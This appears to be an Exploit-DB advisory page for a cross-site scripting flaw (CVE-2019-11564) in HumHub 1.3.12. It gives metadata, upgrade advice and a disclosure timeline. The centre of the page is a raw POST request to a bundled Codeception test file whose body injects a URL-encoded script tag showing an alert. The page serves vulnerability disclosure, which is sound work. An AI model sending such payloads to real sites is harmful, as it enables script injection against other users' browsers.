header-logo
Suggest Exploit
vendor:
HumHub
by:
Kağan EĞLENCE
6.1
CVSS
MEDIUM
Cross-Site Scripting
79
CWE
Product Name: HumHub
Affected Version From: 1.3.12
Affected Version To: 1.3.12
Patch Exists: YES
Related CWE: CVE-2019-11564
CPE: a:humhub:humhub:1.3.12
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2019

HumHub 1.3.12 – Cross-Site Scripting

HumHub version 1.3.12 is vulnerable to Cross-Site Scripting (XSS). An attacker can inject malicious JavaScript code into the vulnerable parameter of the index.php file. This malicious code will be executed in the browser of the victim when the vulnerable page is accessed.

Mitigation:

Upgrade to the latest version of HumHub (1.3.13) to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: HumHub 1.3.12 - Cross-Site Scripting
# Exploit Author: Kağan EĞLENCE
# Vendor Homepage: https://humhub.org/
# Version: 1.3.12
# CVE : CVE-2019-11564


Url : http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php
Vulnerable File :
/protected/vendor/codeception/codeception/tests/data/app/view/index.php
Request Type: POST


#Request Example:
=============

    POST /humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php
HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 64
    Connection: close
    Cookie: xxxx
    Upgrade-Insecure-Requests: 1

    %3Cscript%3Ealert%28%22Vulnerable%22%29%3C%2Fscript%3E=undefined

### History
=============
2019-4-10  Issue discovered
2019-4-10  Vendor contacted
2019-4-10  Vendor response and hotfix
2019-4-27  Advisory release

Navigation

Suggest Exploit

Services By CQR